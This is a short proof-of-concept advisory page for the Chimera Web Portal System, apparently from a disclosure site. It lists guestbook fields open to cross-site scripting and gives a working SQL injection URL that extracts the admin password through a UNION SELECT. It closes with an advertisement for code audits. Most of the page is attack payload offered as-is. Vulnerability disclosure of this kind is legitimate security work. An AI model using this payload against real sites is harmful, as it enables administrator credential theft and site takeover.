PoC/Exploit for Multiple Vulnerabilities in Chimera Web Portal System

Published Proof of Concept code - Multiple Vulnerabilities in Chimera Web Portal System.

Description
Available
Solution
Not available - check Phanatic Softwares website

XSS

Guestbook:
http://host/chimera/modules.php?name=guestbook&file=index

comment_poster=<XSS>

comment_poster_email=<XSS>

comment_poster_homepage=<XSS>

comment_text=<XSS>

SQL Injection

Admin password:
http://host/chimera/linkcategory.php? id=9999'%20union%20select%20admin_password%20from%20admin/*

Order Source Code Audit made by eVuln team

Defend against attacks by PHP code audit of your website made by our team.The work will be done by experts in web security.

Advisories by vuln type